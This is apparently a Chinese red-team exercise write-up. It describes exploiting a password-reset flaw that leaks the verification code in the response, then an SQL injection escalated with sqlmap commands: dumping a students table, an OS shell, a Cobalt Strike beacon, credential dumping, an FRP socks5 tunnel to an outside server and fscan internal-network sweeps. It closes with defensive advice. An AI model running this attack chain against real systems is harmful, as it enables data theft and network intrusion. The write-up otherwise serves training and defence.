攻防演练下的实战思路:贰
字数 1164 2025-08-11 22:57:21
攻防演练实战技术:逻辑漏洞与SQL注入利用详解
1. 弱口令漏洞的持续有效性
尽管弱口令漏洞看似简单,但在攻防演练中仍然普遍存在:
- 伪强口令现象:许多系统使用"好记的强口令"如
gtcz@2022(哥谭市财政局),这类口令仍属于弱口令范畴 - 老资产风险:未登记的老系统中常存在默认口令或简单弱口令
- 利用方法:配合信息收集和自动化工具可有效发现并利用这些弱口令
2. 逻辑漏洞利用实战案例
2.1 信息收集阶段
- 使用FOFA搜索引擎:
title="哥谭"搜索与目标相关的网络资产 - 目录扫描发现敏感路径:
/logfile暴露了用户名(phtyxx)和手机号
2.2 密码重置漏洞利用
- 访问登录界面,选择"忘记密码"功能
- 输入从日志中获取的用户名
- 在密码重置页面输入泄露的手机号
- 使用BurpSuite拦截响应,发现验证码直接包含在响应包中(如
194694) - 使用该验证码完成密码修改,最终获取管理员权限
关键点:验证码缺陷+敏感信息泄露的组合漏洞
3. SQL注入漏洞利用全流程
3.1 漏洞发现与验证
- 使用AWVS扫描发现注入点:
http://x.x.x.x:8010/display.asp?vkind=1%27 - 验证漏洞存在
3.2 数据库信息收集
-
查询所有数据库:
sqlmap -u "http://x.x.x.x:8010/display.asp?vkind=1" --dbs -
查看当前用户权限(确认DBA权限):
sqlmap -u "http://x.x.x.x:8010/display.asp?vkind=1" --current-user -
统计数据库记录数(用于评估数据价值):
sqlmap -u "http://x.x.x:8010/display.asp?vkind=1" -D pdata --count -
获取表结构信息:
sqlmap -u "http://x.x.x.x:8010/display.asp?vkind=1" -D video --tables sqlmap -u "http://x.x.x.x:8010/display.asp?vkind=1" -D video -T vadmin --columns -
导出敏感数据:
sqlmap -u "http://x.x.x.x:8010/display.asp?vkind=1" -D pdata -T students --dump
3.3 服务器权限获取
-
通过xp_cmdshell获取系统权限:
sqlmap -u "http://x.x.x.x:8010/display.asp?vkind=1" --os-shell -
使用PowerShell无文件落地上线Cobalt Strike
-
信息收集:
shell ipconfig /all # 查看网络配置 inject 4884 x64 # 进程注入 logonpasswords # 获取明文密码
3.4 内网渗透准备
建立代理隧道:
-
配置FRP客户端(frpc.ini):
[common] server_addr = x.x.x.x server_port = 7000 [http_proxy] type = tcp remote_port = 6000 plugin = socks5 -
配置FRP服务端(frps.ini):
[common] bind_addr = 0.0.0.0 bind_port = 7000 -
启动服务:
# 服务端 ./frps -c frps.ini # 客户端 shell frpc.exe -c frpc.ini
3.5 内网扫描与利用
-
使用FSCAN进行内网扫描:
shell fscan64.exe -h 10.0.0.0/8 -o 10_result.txt shell fscan64.exe -h 192.168.0.0/16 -o 192_result.txt shell fscan64.exe -h 172.16.0.0/12 -o 172_result.txt -
配置SOCKS代理后使用超级弱口令扫描工具扫描内网弱口令
-
根据扫描结果验证内网漏洞,完成渗透测试
4. 总结与防御建议
攻击技术总结
- 逻辑漏洞利用:验证码缺陷配合信息泄露可绕过认证
- SQL注入利用:从注入到提权的完整链条
- 信息收集 → 数据窃取 → 服务器提权 → 内网渗透
防御建议
-
验证码安全:
- 验证码应在服务端校验,不应出现在响应中
- 验证码应设置有效期且一次性使用
-
SQL注入防护:
- 使用参数化查询
- 最小权限原则,避免使用sa账户
- 禁用xp_cmdshell等危险组件
-
内网安全:
- 网络分段隔离
- 重要系统二次认证
- 定期漏洞扫描与渗透测试
-
日志与监控:
- 敏感操作日志记录
- 异常行为实时监控
- 定期审计日志文件权限
-
密码策略:
- 强制使用真正的强密码
- 定期更换密码
- 多因素认证
通过理解这些攻击技术,安全团队可以更好地构建防御体系,在攻防演练和实际安全防护中取得更好效果。